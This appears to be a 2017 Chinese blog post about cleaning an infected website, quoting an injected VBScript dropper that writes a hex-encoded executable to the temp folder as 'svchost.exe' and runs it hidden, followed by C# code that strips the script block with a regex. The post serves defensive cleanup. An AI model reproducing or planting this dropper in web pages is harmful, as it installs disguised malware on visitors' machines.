替换已xx开头已yy结尾的正则

网站被挂马了，挂马的形式千奇百怪

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000....(此处省略一万字)”

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

用正则去把这段标签替换为空

public static bool checkStr(string path)
{
bool flag = false;
var res = string.Empty;
var regex = new Regex(@"<SCRIPT Language=VBScript>([\s\S]*)</SCRIPT>", RegexOptions.IgnoreCase);
using (StreamReader sr = File.OpenText(path))
{
res = sr.ReadToEnd();
}
if (regex.IsMatch(res))
{
res = regex.Replace(res, " ");
Console.WriteLine("清理成功");
flag = true;
WriteFile(path, res);
}
return flag;
}

以上用的是C#语言

posted @ 2017-09-21 10:49 leeseett 阅读(1124) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

leeseett

替换已xx开头已yy结尾的正则

公告